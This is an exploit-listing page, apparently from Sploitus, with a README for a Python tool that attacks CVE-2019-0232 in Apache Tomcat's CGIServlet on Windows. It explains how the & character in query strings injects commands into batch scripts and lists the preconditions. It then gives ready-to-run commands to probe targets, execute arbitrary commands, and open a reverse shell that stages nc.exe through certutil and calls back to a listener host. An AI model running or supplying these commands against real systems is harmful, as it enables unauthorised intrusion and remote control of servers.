Share
## https://sploitus.com/exploit?id=CEA2DCF2-7958-513E-B0A6-E43A1A827610
CVE-2019-0232
Apache Tomcat CGIServlet enableCmdLineArguments RCE
Windows batch script injection via query string arguments
### Description
Apache Tomcat with the CGI servlet enabled and `enableCmdLineArguments=true` passes query string parameters as command-line arguments to CGI scripts. On Windows, batch files (`.bat`/`.cmd`) interpret `&` as a command separator, allowing arbitrary command execution via a crafted URL.
### Preconditions
- CGI servlet enabled in `conf/web.xml` or `WEB-INF/web.xml`
- `enableCmdLineArguments=true` in the CGI servlet init-params
- A CGI script (e.g. `ism.bat`) deployed and accessible
- Windows target (batch files are required for `&` injection)
### Usage
```
git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
```
Check if CGI endpoint exists:
```
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
```
Execute a command:
```
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
```
Reverse shell (2-stage certutil + nc.exe):
```
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444
```
### Requirements
- Python 3.8+
- requests
- Windows target (vulnerability is OS-specific)